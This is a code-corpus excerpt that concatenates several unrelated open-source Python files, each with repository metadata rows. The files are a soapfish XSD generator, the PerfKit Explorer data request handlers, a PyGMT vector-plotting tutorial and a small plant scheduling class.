work_dir = sys.argv[1]
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print "Exiting..."
|
mit
| 7,905,393,709,264,332,000 | 27.346774 | 106 | 0.565576 | false |
vpistis/soapfish
|
soapfish/py2xsd.py
|
1
|
11116
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import imp
import inspect
import itertools
import logging
import six
import textwrap
from lxml import etree
from . import namespaces as ns
from . import xsd, xsdspec
from .compat import basestring
from .utils import uncapitalize
NUMERIC_TYPES = [xsd.Decimal, xsd.Integer, xsd.Int, xsd.Long, xsd.Short,
xsd.UnsignedByte, xsd.UnsignedInt, xsd.UnsignedLong, xsd.UnsignedShort,
xsd.Double, xsd.Float, xsd.Byte]
STRING_TYPES = [xsd.QName, xsd.AnyURI, xsd.Base64Binary, xsd.QName,
xsd.AnyType, xsd.Duration]
ALL_TYPES = NUMERIC_TYPES + STRING_TYPES
logger = logging.getLogger('soapfish')
# --- Helpers -----------------------------------------------------------------
def get_xsd_type(_type):
'''
Check if type_ is a basic type in the XSD scope otherwise it must be user
defined type.
'''
base_class = _type.__class__.__bases__[0]
if base_class == xsd.SimpleType or _type.__class__ in ALL_TYPES:
return 'xsd:' + uncapitalize(_type.__class__.__name__)
else:
return 'sns:' + uncapitalize(_type.__class__.__name__)
def xsd_attribute(attribute):
xsdattr = xsdspec.Attribute()
xsdattr.name = attribute._name
xsdattr.use = attribute.use
xsdattr.type = get_xsd_type(attribute._type)
return xsdattr
def create_xsd_element(element):
xsd_element = xsdspec.Element()
xsd_element.name = element.tagname if element.tagname else element._name
xsd_element.nillable = element.nillable
xsd_element.minOccurs = element._minOccurs
if hasattr(element, '_maxOccurs'):
xsd_element.maxOccurs = element._maxOccurs
# SimpleType defined in place.
parent_type = element._type.__class__.__bases__[0]
_type = element._type
if not inspect.isclass(element._passed_type):
xsd_element.simpleType = xsdspec.SimpleType()
xsd_element.simpleType.restriction = xsdspec.Restriction()
xsd_element.simpleType.restriction.base = get_xsd_type(element._type)
if hasattr(element._type, 'enumeration') and element._type.enumeration\
and parent_type == xsd.SimpleType:
for value in element._type.enumeration:
enum = xsdspec.Enumeration.create(value)
xsd_element.simpleType.restriction.enumerations.append(enum)
if hasattr(_type, 'fractionDigits') and _type.fractionDigits:
xsd_element.simpleType.restriction.fractionDigits = xsdspec.RestrictionValue(value=str(_type.fractionDigits))
if hasattr(_type, 'pattern') and _type.pattern:
xsd_element.simpleType.restriction.pattern = xsdspec.Pattern(value=str(_type.pattern))
if hasattr(_type, 'minInclusive') and _type.minInclusive:
xsd_element.simpleType.restriction.minInclusive = xsdspec.RestrictionValue(value=str(_type.minInclusive))
if hasattr(_type, 'minExclusive') and _type.minExclusive:
xsd_element.simpleType.restriction.minExclusive = xsdspec.RestrictionValue(value=str(_type.minExclusive))
if hasattr(_type, 'maxExclusive') and _type.maxExclusive:
xsd_element.simpleType.restriction.maxExclusive = xsdspec.RestrictionValue(value=str(_type.maxExclusive))
if hasattr(_type, 'maxInclusive') and _type.maxInclusive:
xsd_element.simpleType.restriction.maxInclusive = xsdspec.RestrictionValue(value=str(_type.maxInclusive))
if hasattr(_type, 'totalDigits') and _type.totalDigits:
xsd_element.simpleType.restriction.totalDigits = xsdspec.RestrictionValue(value=str(_type.totalDigits))
else:
xsd_element.type = get_xsd_type(element._type)
return xsd_element
def xsd_complexType(complexType, named=True):
xsd_ct = xsdspec.XSDComplexType()
if named:
xsd_ct.name = uncapitalize(complexType.__name__)
for attribute in complexType._meta.attributes:
xsd_attr = xsd_attribute(attribute)
xsd_ct.attributes.append(xsd_attr)
# Elements can be wrapped with few type of containers:
# sequence, all, choice or it can be a complexContent with
# extension or restriction.
if hasattr(complexType, 'INDICATOR') and complexType.INDICATOR is not None:
xsd_sequence = xsdspec.Sequence()
setattr(xsd_ct, complexType.INDICATOR.__name__.lower(), xsd_sequence)
container = xsd_sequence
else:
container = xsd_ct
for element in complexType._meta.fields:
for element_ in element.xsd_elements():
if element_._type is None:
# The type must be known in order to generate a valid schema. The
# error occured when using the built-in WSDL generation but I was
# unable to reproduce the error condition in a test case.
# Forcing type evaluation fixed the problem though.
element_._evaluate_type()
xsd_element = create_xsd_element(element_)
container.elements.append(xsd_element)
return xsd_ct
def xsd_simpleType(st):
xsd_simpleType = xsdspec.SimpleType()
xsd_simpleType.name = uncapitalize(st.__name__)
xsd_restriction = xsdspec.Restriction()
xsd_restriction.base = get_xsd_type(st.__bases__[0]())
if hasattr(st, 'enumeration') and st.enumeration:
for enum in st.enumeration:
xsd_restriction.enumerations.append(xsdspec.Enumeration.create(enum))
if hasattr(st, 'fractionDigits') and st.fractionDigits:
xsd_restriction.fractionDigits = xsdspec.RestrictionValue(value=st.fractionDigits)
elif hasattr(st, 'pattern') and st.pattern:
xsd_restriction.pattern = xsdspec.Pattern(value=st.pattern)
xsd_simpleType.restriction = xsd_restriction
return xsd_simpleType
def build_imports(xsd_schema, imports):
counter = 0
if imports:
for _import in imports:
xsd_import = xsdspec.Import()
xsd_import.namespace = _import.targetNamespace
if _import.location:
xsd_import.schemaLocation = _import.location
xsd_schema.imports.append(xsd_import)
counter += 1
def build_includes(xsd_schema, includes):
if includes:
for _include in includes:
xsd_include = xsdspec.Include()
if _include.location:
xsd_include.schemaLocation = _include.location
xsd_schema.includes.append(xsd_include)
def generate_xsdspec(schema):
xsd_schema = xsdspec.Schema()
xsd_schema.targetNamespace = schema.targetNamespace
xsd_schema.elementFormDefault = schema.elementFormDefault
build_imports(xsd_schema, schema.imports)
build_includes(xsd_schema, schema.includes)
for st in schema.simpleTypes:
xsd_st = xsd_simpleType(st)
xsd_schema.simpleTypes.append(xsd_st)
for ct in schema.complexTypes:
xsd_ct = xsd_complexType(ct)
xsd_schema.complexTypes.append(xsd_ct)
generate_elements(xsd_schema, schema)
return xsd_schema
def generate_elements(xsd_schema, schema):
for name, element in six.iteritems(schema.elements):
xsd_element = xsdspec.Element()
xsd_element.name = name
if isinstance(element._passed_type, basestring) or inspect.isclass(element._passed_type):
xsd_element.type = get_xsd_type(element._type)
else:
xsd_element.complexType = xsd_complexType(element._type.__class__, named=False)
xsd_schema.elements.append(xsd_element)
def generate_xsd(schema):
xsd_schema = generate_xsdspec(schema)
xmlelement = etree.Element(
'{%s}schema' % ns.xsd,
nsmap={
'sns': schema.targetNamespace,
'xsd': xsdspec.XSD_NAMESPACE,
},
)
xsd_schema.render(xmlelement,
xsd_schema,
namespace=xsdspec.XSD_NAMESPACE,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED)
return xmlelement
def schema_validator(schema):
"""
Return a callable for the specified soapfish schema which can be used
to validate (etree) xml documents.
The method takes care of resolving imported (soapfish) schemas but prevents
any unwanted network access.
"""
class SchemaResolver(etree.Resolver):
def __init__(self, schemas, *args, **kwargs):
super(SchemaResolver, self).__init__(*args, **kwargs)
self._soapfish_schemas = {}
self._map(schema)
def _map(self, schema):
for item in itertools.chain(schema.imports, schema.includes):
if item.location not in self._soapfish_schemas:
self._soapfish_schemas[item.location] = item
self._map(item)
def resolve(self, url, id_, context):
if url in self._soapfish_schemas:
schema_string = etree.tostring(generate_xsd(self._soapfish_schemas[url]))
return self.resolve_string(schema_string, context)
# prevent unwanted network access
raise ValueError('can not resolve %r - not a known soapfish schema' % url)
parser = etree.XMLParser(load_dtd=True)
resolver = SchemaResolver(schema)
parser.resolvers.add(resolver)
# unfortunately we have to parse the whole schema from string so we are
# able to configure a custom resolver just for this instance. This seems to
# a limitation of the lxml API.
# I tried to use '.parser.resolvers.add()' on an ElementTree instance but
# that uses the default parser which refers to a shared _ResolverRegistry
# which can not be cleared without having references to all registered
# resolvers (and we don't know these instances). Also I noticed many test
# failures (only when running all tests!) and strange behavior in
# "resolve()" (self._soapfish_schemas was empty unless doing repr() on the
# instance attribute first).
# Also having shared resolvers is not a good idea because a user might want
# to have different validator instances at the same time (possibly with
# conflicting namespace urls).
schema_xml = etree.tostring(generate_xsd(schema))
schema_element = etree.fromstring(schema_xml, parser)
xml_schema = etree.XMLSchema(schema_element)
return xml_schema.assertValid
# --- Program -----------------------------------------------------------------
def parse_arguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
Generates an XSD document from a Python module.
'''))
parser.add_argument('module', help='The path to a python module.')
return parser.parse_args()
def main():
opt = parse_arguments()
logger.info('Generating XSD for module \'%s\'...' % opt.module)
module = imp.load_source('module.name', opt.module)
schema = getattr(module, 'Schema')
tree = generate_xsd(schema)
print(etree.tostring(tree, pretty_print=True))
if __name__ == '__main__':
main()
|
bsd-3-clause
| -7,496,999,152,012,229,000 | 37.199313 | 121 | 0.66004 | false |
GoogleCloudPlatform/PerfKitExplorer
|
server/perfkit/explorer/handlers/data.py
|
1
|
10892
|
"""Copyright 2014 Google Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Main entry module for data specified in app.yaml.
This module contains the Http handlers for data requests (as JSON) in the
Perfkit Explorer application (as well as other consumers). Data URL's are
prefixed with /data/{source} in the REST API, and in general the entities are
referenced with GET requests.
"""
__author__ = 'joemu@google.com (Joe Allan Muharsky)'
import json
import logging
import MySQLdb
import time
from google.appengine.api import urlfetch_errors
from google.appengine.api import users
from google.appengine.runtime import apiproxy_errors
import google.appengine.runtime
import base
from perfkit.common import big_query_client
from perfkit.common import big_query_result_util as result_util
from perfkit.common import big_query_result_pivot
from perfkit.common import data_source_config
from perfkit.common import gae_big_query_client
from perfkit.common import gae_cloud_sql_client
from perfkit.common import http_util
from perfkit.explorer.model import dashboard
from perfkit.explorer.model import explorer_config
from perfkit.explorer.samples_mart import explorer_method
from perfkit.explorer.samples_mart import product_labels
from perfkit.ext.cloudsql.models import cloudsql_config
import webapp2
from google.appengine.api import urlfetch
DATASET_NAME = 'samples_mart'
URLFETCH_TIMEOUT = 50
ERROR_TIMEOUT = 'The request timed out.'
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
class Error(Exception):
pass
class SecurityError(Error):
pass
class DataHandlerUtil(object):
"""Class used to allow us to replace clients with test versions."""
# TODO: Refactor this out into a generic class capable of choosing
# the appropriate data_client for tests and/or product code.
@classmethod
def GetDataClient(cls, env):
"""Returns an instance of a data client for the specified environment.
This is used for testability and GAE support purposes to replace the
default GAE-enabled data client with a "local" one for running unit
tests.
Args:
env: The environment to connect to. For more detail, see
perfkit.data_clients.data_source_config.Environments.
Returns:
A valid data client.
"""
return gae_big_query_client.GaeBigQueryClient(env=env)
class FieldDataHandler(base.RequestHandlerBase):
"""Http handler for getting a list of distinct Field values (/data/fields).
This handler allows start/end date, project_name, test and metric to be
supplied as GET parameters for filtering, and field_name determines the
field to return. It returns, and returns an array of dicts in the
following format:
[{'value': 'time-to-complete'},
{'value': 'weight'}]
"""
def get(self):
"""Request handler for GET operations."""
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
filters = http_util.GetJsonParam(self.request, 'filters')
start_date = filters['start_date']
end_date = filters['end_date']
product_name = filters['product_name']
test = filters['test']
metric = filters['metric']
field_name = self.request.GET.get('field_name')
config = explorer_config.ExplorerConfigModel.Get()
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
query = explorer_method.ExplorerQueryBase(
data_client=client,
dataset_name=config.default_dataset)
query.fields = [field_name + ' AS name']
query.tables = ['lookup_field_cube']
query.wheres = []
if start_date:
query.wheres.append(
'day_timestamp >= %s' %
(explorer_method.ExplorerQueryBase
.GetTimestampFromFilterExpression(
start_date)))
if end_date:
query.wheres.append(
'day_timestamp <= %s' %
(explorer_method.ExplorerQueryBase
.GetTimestampFromFilterExpression(
end_date)))
if product_name and field_name != 'product_name':
query.wheres.append('product_name = "%s"' % product_name)
if test and field_name not in ['test', 'product_name']:
query.wheres.append('test = "%s"' % test)
if metric and field_name not in ['metric', 'test', 'product_name']:
query.wheres.append('metric = "%s"' % metric)
query.groups = ['name']
query.orders = ['name']
response = query.Execute()
data = {'rows': response['rows']}
self.RenderJson(data)
class MetadataDataHandler(base.RequestHandlerBase):
"""Http handler for getting a list of Metadata (Label/Values).
This handler requires project_name and test to be supplied as GET
parameters, and returns an array of dicts in the following format:
[{'label': 'time-to-complete'},
{'label': 'weight', 'value': '20'}]
"""
def get(self):
"""Request handler for GET operations."""
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
config = explorer_config.ExplorerConfigModel.Get()
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
query = product_labels.ProductLabelsQuery(
data_client=client,
dataset_name=config.default_dataset)
filters = http_util.GetJsonParam(self.request, 'filters')
start_date = None
if 'start_date' in filters and filters['start_date']:
start_date = filters['start_date']
end_date = None
if 'end_date' in filters and filters['end_date']:
end_date = filters['end_date']
response = query.Execute(
start_date=start_date,
end_date=end_date,
product_name=filters['product_name'],
test=filters['test'],
metric=filters['metric'])
self.RenderJson({'labels': response['labels']})
class SqlDataHandler(base.RequestHandlerBase):
"""Http handler for returning the results of a SQL statement (/data/sql).
This handler will look for a SQL query in the POST data with a datasource
parameter. Notably, the following elements are expected:
{'datasource': {
'query': 'SELECT foo FROM bar',
'config': {
... // Unused properties for a strict SQL statement.
'results': {
'pivot': false,
'pivot_config': {
'row_field': '',
'column_field': '',
'value_field': '',
}
}
}
}
This handler returns an array of arrays in the following format:
[['product_name', 'test', 'min', 'avg'],
['widget-factory', 'create-widget', 2.2, 3.1]]
"""
def post(self):
"""Request handler for POST operations."""
try:
start_time = time.time()
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
config = explorer_config.ExplorerConfigModel.Get()
request_data = json.loads(self.request.body)
datasource = request_data.get('datasource')
if not datasource:
raise KeyError('The datasource is required to run a query')
query = datasource.get('query_exec') or datasource.get('query')
if not query:
raise KeyError('datasource.query must be provided.')
if (not config.grant_query_to_public and
not users.is_current_user_admin()):
dashboard_id = request_data.get('dashboard_id')
if not dashboard_id:
raise KeyError('The dashboard id is required to run a query')
widget_id = request_data.get('id')
if not widget_id:
raise KeyError('The widget id is required to run a query')
if dashboard.Dashboard.IsQueryCustom(query, dashboard_id, widget_id):
raise SecurityError('The user is not authorized to run custom queries')
else:
logging.error('Query is identical.')
cache_duration = config.cache_duration or None
logging.debug('Query datasource: %s', datasource)
query_config = datasource['config']
if datasource.get('type', 'BigQuery') == 'Cloud SQL':
logging.debug('Using Cloud SQL backend')
cloudsql_client_config = query_config.get('cloudsql')
if not cloudsql_client_config:
cloudsql_client_config = {}
cloudsql_server_config = cloudsql_config.CloudsqlConfigModel.Get()
client = gae_cloud_sql_client.GaeCloudSqlClient(
instance=cloudsql_client_config.get('instance'),
db_name=cloudsql_client_config.get('database_name'),
db_user=cloudsql_server_config.username,
db_password=cloudsql_server_config.password)
else:
logging.debug('Using BigQuery backend')
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
response = client.Query(query, cache_duration=cache_duration)
if query_config['results'].get('pivot'):
pivot_config = query_config['results']['pivot_config']
transformer = big_query_result_pivot.BigQueryPivotTransformer(
reply=response,
rows_name=pivot_config['row_field'],
columns_name=pivot_config['column_field'],
values_name=pivot_config['value_field'])
transformer.Transform()
response['results'] = (
result_util.ReplyFormatter.RowsToDataTableFormat(response))
elapsed_time = time.time() - start_time
response['elapsedTime'] = elapsed_time
self.RenderJson(response)
# If 'expected' errors occur (specifically dealing with SQL problems),
# return JSON with descriptive text so that we can give the user a
# constructive error message.
# TODO: Formalize error reporting/handling across the application.
except (big_query_client.BigQueryError, big_query_result_pivot.DuplicateValueError,
ValueError, KeyError, SecurityError) as err:
logging.error(str(err))
self.RenderJson({'error': str(err)})
except MySQLdb.OperationalError as err:
self.RenderJson({'error': 'MySQLdb error %s' % str(err)})
except (google.appengine.runtime.DeadlineExceededError,
apiproxy_errors.DeadlineExceededError,
urlfetch_errors.DeadlineExceededError):
self.RenderText(text=ERROR_TIMEOUT, status=408)
def get(self):
"""Request handler for GET operations."""
self.post()
# Main WSGI app as specified in app.yaml
app = webapp2.WSGIApplication(
[('/data/fields', FieldDataHandler),
('/data/metadata', MetadataDataHandler),
('/data/sql', SqlDataHandler)])
|
apache-2.0
| -780,532,374,467,009,900 | 32.826087 | 87 | 0.685274 | false |
GenericMappingTools/gmt-python
|
examples/tutorials/vectors.py
|
1
|
13414
|
"""
Plotting vectors
================
Plotting vectors is handled by :meth:`pygmt.Figure.plot`.
"""
# sphinx_gallery_thumbnail_number = 6
import numpy as np
import pygmt
########################################################################################
# Plot Cartesian Vectors
# ----------------------
#
# Create a simple Cartesian vector using a starting point through
# ``x``, ``y``, and ``direction`` parameters.
# On the shown figure, the plot is projected on a 10cm X 10cm region,
# which is specified by the ``projection`` parameter.
# The direction is specified
# by a list of two 1d arrays structured as ``[[angle_in_degrees], [length]]``.
# The angle is measured in degrees and moves counter-clockwise from the
# horizontal.
# The length of the vector uses centimeters by default but
# could be changed using :meth:`pygmt.config`
# (Check the next examples for unit changes).
#
# Notice that the ``v`` in the ``style`` parameter stands for
# vector; it distinguishes it from regular lines and allows for
# different customization. ``0c`` is used to specify the size
# of the arrow head which explains why there is no arrow on either
# side of the vector.
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
x=2,
y=8,
style="v0c",
direction=[[-45], [6]],
)
fig.show()
########################################################################################
# In this example, we apply the same concept shown previously to plot multiple
# vectors. Notice that instead of passing int/float to ``x`` and ``y``, a list
# of all x and y coordinates will be passed. Similarly, the length of direction
# list will increase accordingly.
#
# Additionally, we change the style of the vector to include a red
# arrow head at the end (**+e**) of the vector and increase the
# thickness (``pen="2p"``) of the vector stem. A list of different
# styling attributes can be found in
# :doc:`Vector heads and tails </gallery/lines/vector_heads_tails>`.
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
x=[2, 4],
y=[8, 1],
style="v0.6c+e",
direction=[[-45, 23], [6, 3]],
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# The default unit of vector length is centimeters,
# however, this can be changed to inches or points. Note that, in PyGMT,
# one point is defined as 1/72 inch.
#
# In this example, the graphed region is 5in X 5in, but
# the length of the first vector is still graphed in centimeters.
# Using ``pygmt.config(PROJ_LENGTH_UNIT="i")``, the default unit
# can be changed to inches in the second plotted vector.
fig = pygmt.Figure()
# Vector 1 with default unit as cm
fig.plot(
region=[0, 10, 0, 10],
projection="X5i/5i",
frame="ag",
x=2,
y=8,
style="v1c+e",
direction=[[0], [3]],
pen="2p",
color="red3",
)
# Vector 2 after changing default unit to inch
with pygmt.config(PROJ_LENGTH_UNIT="i"):
fig.plot(
x=2,
y=7,
direction=[[0], [3]],
style="v1c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Vectors can also be plotted by including all the information
# about a vector in a single list. However, this requires creating
# a 2D list or numpy array containing all vectors.
# Each vector list contains the information structured as:
# ``[x_start, y_start, direction_degrees, length]``.
#
# If this approach is chosen, the ``data`` parameter must be
# used instead of ``x``, ``y`` and ``direction``.
# Create a list of lists that include each vector information
vectors = [[2, 3, 45, 4]]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
data=vectors,
style="v0.6c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Using the functionality mentioned in the previous example,
# multiple vectors can be plotted at the same time. Another
# vector could be simply added to the 2D list or numpy
# array object and passed using ``data`` parameter.
# Vector specifications structured as: [x_start, y_start, direction_degrees, length]
vector_1 = [2, 3, 45, 4]
vector_2 = [7.5, 8.3, -120.5, 7.2]
# Create a list of lists that include each vector information
vectors = [vector_1, vector_2]
# Vectors structure: [[2, 3, 45, 4], [7.5, 8.3, -120.5, 7.2]]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c/10c",
frame="ag",
data=vectors,
style="v0.6c+e",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# In this example, cartesian vectors are plotted over a Mercator
# projection of the continental US. The x values represent the
# longitude and y values represent the latitude where the vector starts.
#
# This example also shows some of the styles a vector supports.
# The beginning point of the vector (**+b**)
# should take the shape of a circle (**c**). Similarly, the end
# point of the vector (**+e**) should have an arrow shape (**a**)
# (to draw a plain arrow, use **A** instead). Lastly, the **+a**
# specifies the angle of the vector head apex (30 degrees in
# this example).
# Create a plot with coast, Mercator projection (M) over the continental US
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame="ag",
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
land="grey",
water="lightblue",
)
# Plot a vector using the x, y, direction parameters
style = "v0.4c+bc+ea+a30"
fig.plot(
x=-110,
y=40,
style=style,
direction=[[-25], [3]],
pen="1p",
color="red3",
)
# vector specifications structured as: [x_start, y_start, direction_degrees, length]
vector_2 = [-82, 40.5, 138, 2.5]
vector_3 = [-71.2, 45, -115.7, 4]
# Create a list of lists that include each vector information
vectors = [vector_2, vector_3]
# Plot vectors using the data parameter.
fig.plot(
data=vectors,
style=style,
pen="1p",
color="yellow",
)
fig.show()
########################################################################################
# Another example of plotting cartesian vectors over a coast plot. This time
# a Transverse Mercator projection is used. Additionally, :func:`numpy.linspace`
# is used to create 5 vectors with equal stops.
x = np.linspace(36, 42, 5) # x values = [36. 37.5 39. 40.5 42. ]
y = np.linspace(39, 39, 5) # y values = [39. 39. 39. 39.]
direction = np.linspace(-90, -90, 5) # direction values = [-90. -90. -90. -90.]
length = np.linspace(1.5, 1.5, 5) # length values = [1.5 1.5 1.5 1.5]
# Create a plot with coast, Mercator projection (M) over the continental US
fig = pygmt.Figure()
fig.coast(
region=[20, 50, 30, 45],
projection="T35/10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
land="lightbrown",
water="lightblue",
)
fig.plot(
x=x,
y=y,
style="v0.4c+ea+bc",
direction=[direction, length],
pen="0.6p",
color="red3",
)
fig.show()
########################################################################################
# Plot Circular Vectors
# ---------------------
#
# When plotting circular vectors, all of the information for a single vector is
# to be stored in a list. Each circular vector list is structured as:
# ``[x_start, y_start, radius, degree_start, degree_stop]``. The first two values in
# the vector list represent the origin of the circle that will be plotted.
# The next value is the radius which is represented on the plot in centimeters.
#
# The last two values in the vector list represent the degree at which the plot
# will start and stop. These values are measured counter-clockwise from the horizontal
# axis. In this example, the result show is the left half of a circle as the
# plot starts at 90 degrees and goes until 270. Notice that the ``m`` in the
# ``style`` parameter stands for circular vectors.
fig = pygmt.Figure()
circular_vector_1 = [0, 0, 2, 90, 270]
data = [circular_vector_1]
fig.plot(
region=[-5, 5, -5, 5],
projection="X10c",
frame="ag",
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
# Another example using np.array()
circular_vector_2 = [0, 0, 4, -90, 90]
data = np.array([circular_vector_2])
fig.plot(
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# When plotting multiple circular vectors, a two dimensional array or numpy array
# object should be passed as the ``data`` parameter. In this example, :func:`numpy.column_stack`
# is used to generate this two dimensional array. Other numpy objects are used to
# generate linear values for the ``radius`` parameter and random values for
# the ``degree_stop`` parameter discussed in the previous example. This is
# the reason in which each vector has
# a different appearance on the projection.
vector_num = 5
radius = 3 - (0.5 * np.arange(0, vector_num))
startdir = np.full(vector_num, 90)
stopdir = 180 + (50 * np.arange(0, vector_num))
data = np.column_stack(
[np.full(vector_num, 0), np.full(vector_num, 0), radius, startdir, stopdir]
)
fig = pygmt.Figure()
fig.plot(
region=[-5, 5, -5, 5],
projection="X10c",
frame="ag",
data=data,
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Much like when plotting Cartesian vectors, the default unit used is centimeters.
# When this is changed to inches, the size of the plot appears larger when the
# projection units do not change. Below is an example of two circular vectors.
# One is plotted using the default unit, and the second is plotted using inches.
# Despite using the same list to plot the vectors, a different measurement unit
# causes one to be larger than the other.
circular_vector = [6, 5, 1, 90, 270]
fig = pygmt.Figure()
fig.plot(
region=[0, 10, 0, 10],
projection="X10c",
frame="ag",
data=[circular_vector],
style="m0.5c+ea",
pen="2p",
color="red3",
)
with pygmt.config(PROJ_LENGTH_UNIT="i"):
fig.plot(
data=[circular_vector],
style="m0.5c+ea",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Plot Geographic Vectors
# -----------------------
# On this map,
# ``point_1`` and ``point_2`` are coordinate pairs used to set the
# start and end points of the geographic vector.
# The geographical vector is going from Idaho to
# Chicago. To style geographic
# vectors, use ``=`` at the beginning of the ``style`` parameter.
# Other styling features such as vector stem thickness and head color
# can be passed into the ``pen`` and ``color`` parameters.
#
# Note that the **+s** is added to use a startpoint and an endpoint
# to represent the vector instead of input angle and length.
point_1 = [-114.7420, 44.0682]
point_2 = [-87.6298, 41.8781]
data = np.array([point_1 + point_2])
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
########################################################################################
# Using the same technique shown in the previous example,
# multiple vectors can be plotted in a chain where the endpoint
# of one is the starting point of another. This can be done
# by adding the coordinate lists together to create this structure:
# ``[[start_latitude, start_longitude, end_latitude, end_longitude]]``.
# Each list within the 2D list contains the start and end information
# for each vector.
# Coordinate pairs for all the locations used
ME = [-69.4455, 45.2538]
CHI = [-87.6298, 41.8781]
SEA = [-122.3321, 47.6062]
NO = [-90.0715, 29.9511]
KC = [-94.5786, 39.0997]
CA = [-119.4179, 36.7783]
# Add array to piece together the vectors
data = [ME + CHI, CHI + SEA, SEA + KC, KC + NO, NO + CA]
fig = pygmt.Figure()
fig.coast(
region=[-127, -64, 24, 53],
projection="M10c",
frame=True,
borders=1,
shorelines="0.25p,black",
area_thresh=4000,
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
################################################################################
# This example plots vectors over a Mercator projection. The starting points are
# located at SA which is South Africa and going to four different
# locations.
SA = [22.9375, -30.5595]
EUR = [15.2551, 54.5260]
ME = [-69.4455, 45.2538]
AS = [100.6197, 34.0479]
NM = [-105.8701, 34.5199]
data = np.array([SA + EUR, SA + ME, SA + AS, SA + NM])
fig = pygmt.Figure()
fig.coast(
region=[-180, 180, -80, 80],
projection="M0/0/12c",
frame="afg",
land="lightbrown",
water="lightblue",
)
fig.plot(
data=data,
style="=0.5c+ea+s",
pen="2p",
color="red3",
)
fig.show()
|
bsd-3-clause
| 3,405,470,525,067,376,000 | 29.27991 | 96 | 0.601387 | false |
fredmorcos/attic
|
projects/plantmaker/archive/20100707/src/extra/schedule.py
|
1
|
2899
|
from printer import pretty, GREEN, YELLOW, CYAN
class Schedule(object):
def __init__(self):
self.schedule = []
self.startTimes = []
self.finishTimes = []
self.report = {}
self.fitness = None
self.startTime = (2,0,0)
def maxTime(self):
if len(self.schedule) > 0:
maxTime = self.schedule[0][2]
for s in self.schedule:
if s[2] > maxTime:
maxTime = s[2]
for s in self.finishTimes:
if s[1] > maxTime:
maxTime = s[1]
return maxTime
return 0
def minTime(self):
if len(self.schedule) > 0:
minTime = self.schedule[0][2]
for s in self.schedule:
if s[2] < minTime:
minTime = s[2]
for s in self.finishTimes:
if s[1] < minTime:
minTime = s[1]
return minTime
return 0
def getTimeAt(self, t):
hours = ((int)(t / 3600)) + self.startTime[0]
mins= ((t % 3600) / 60) + self.startTime[1]
seconds = ((t % 3600) % 60) + self.startTime[2]
if hours < 10:
hours = "0%d" % (hours)
if mins < 10:
mins = "0%d" % (mins)
if seconds < 10:
seconds = "0%d" % (seconds)
return "%2s:%2s:%2s" % (hours , mins, seconds)
def __repr__(self):
res = ""
minTime, maxTime = self.minTime(), self.maxTime()
res += pretty("%10s%10s%5s%15s\n" % ("Time", "Order","", "Machine"), GREEN)
res += pretty("----------------------------------------\n", GREEN)
i = minTime
while i <= maxTime:
for s in self.schedule:
if s[2] == i:
if "kettle" in s[1]:
res += pretty("%10s%10s%10s%5s%15s\n" % (s[2], self.getTimeAt(s[2]), s[0], "->", s[1]), CYAN)
else:
res += "%10s%10s%10s%5s%15s\n" % (s[2], self.getTimeAt(s[2]), s[0], "->", s[1])
for s in self.finishTimes:
if s[1] == i:
res += pretty("%10s%10s%10s finished.\n" % (s[1], self.getTimeAt(s[1]), s[0]), YELLOW)
i += 1
res += pretty("----------------------------------------\n", GREEN)
res += pretty("Fitness: %s\n" % (self.fitness), YELLOW)
res += pretty("----------------------------------------\n", GREEN)
return res
def loadStartTimes(self, plant):
assert len(self.startTimes) == 0
firstMachineName = plant.machines[0].name
for s in self.schedule:
if s[0].currentMachine == "":
if s[1] == firstMachineName:
self.startTimes.append(s)
else:
if s[1] == s[0].currentMachine:
self.startTimes.append(s)
self.schedule = []
self.finishTimes = []
def sort(self, func = lambda a, b: cmp(a[1], b[1])):
self.schedule.sort(func)
def __getitem__(self, key):
print key
return self.schedule[key]
def __setitem__(self, key, value):
self.schedule[key] = value
def __eq__(self, s):
for i in s.startTimes:
for j in self.startTimes:
if i[0] == j[0] and i[1] == j[1]:
if i[2] != j[2]:
return False
return True
def unNormalize(self, normVal):
for s in self.schedule:
s[2] *= normVal
for s in self.finishTimes:
s[1] *= normVal
|
isc
